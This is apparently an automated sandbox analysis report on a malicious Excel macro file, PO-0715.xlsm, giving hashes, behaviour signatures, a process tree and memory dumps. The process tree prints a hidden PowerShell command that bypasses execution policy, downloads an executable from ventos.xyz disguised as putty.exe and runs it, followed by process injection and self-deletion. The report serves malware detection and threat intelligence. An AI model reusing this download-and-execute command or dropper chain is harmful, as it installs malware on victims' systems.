Overview

overview

10

Static

static

PO-0715.xlsm

windows7_x64

10

PO-0715.xlsm

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-07-2020 09:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO-0715.xlsm

  • Size

    92KB

  • MD5

    d89a828241cd67ebdc96a905e5924f24

  • SHA1

    90ef404e139164b266d553a5e094b01c0e810b4f

  • SHA256

    dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4

  • SHA512

    7b83617ed1b56eb3181ddf2a7bd9b9122eae6844cf881312fb2f8c1dc1cf62d92ac2a48b841235978d4f68ea59417009e85095eaabb97859b5e67989e86df6c5

Score
10/10
evasiontrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ventos.xyz/hen.exe

Signatures

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Checks whether UAC is enabled
    • Suspicious use of SendNotifyMessage
    • Suspicious use of FindShellTrayWindow
    PID:1312
    • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-0715.xlsm
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: AddClipboardFormatListener
      PID:1448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ventos.xyz/hen.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        • Process spawned unexpected child process
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: EnumeratesProcesses
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Executes dropped EXE
          PID:1872
          • C:\Users\Admin\AppData\Local\Temp\putty.exe
            "C:\Users\Admin\AppData\Local\Temp\putty.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Executes dropped EXE
            PID:1548
            • C:\Windows\SysWOW64\cmmon32.exe
              "C:\Windows\SysWOW64\cmmon32.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:844
              • C:\Windows\SysWOW64\cmd.exe
                /c del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
                7⤵
                  PID:1488

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/844-18-0x0000000000620000-0x000000000062D000-memory.dmp

      Filesize

      52KB

      Download

    • memory/844-20-0x0000000001F30000-0x0000000001FE5000-memory.dmp

      Filesize

      724KB

      Download

    • memory/1312-16-0x0000000006D30000-0x0000000006E9C000-memory.dmp

      Filesize

      1.4MB

      Download

    • memory/1312-21-0x0000000004F30000-0x0000000005010000-memory.dmp

      Filesize

      896KB

      Download

    • memory/1448-4-0x0000000005EC0000-0x0000000005FC0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/1548-13-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download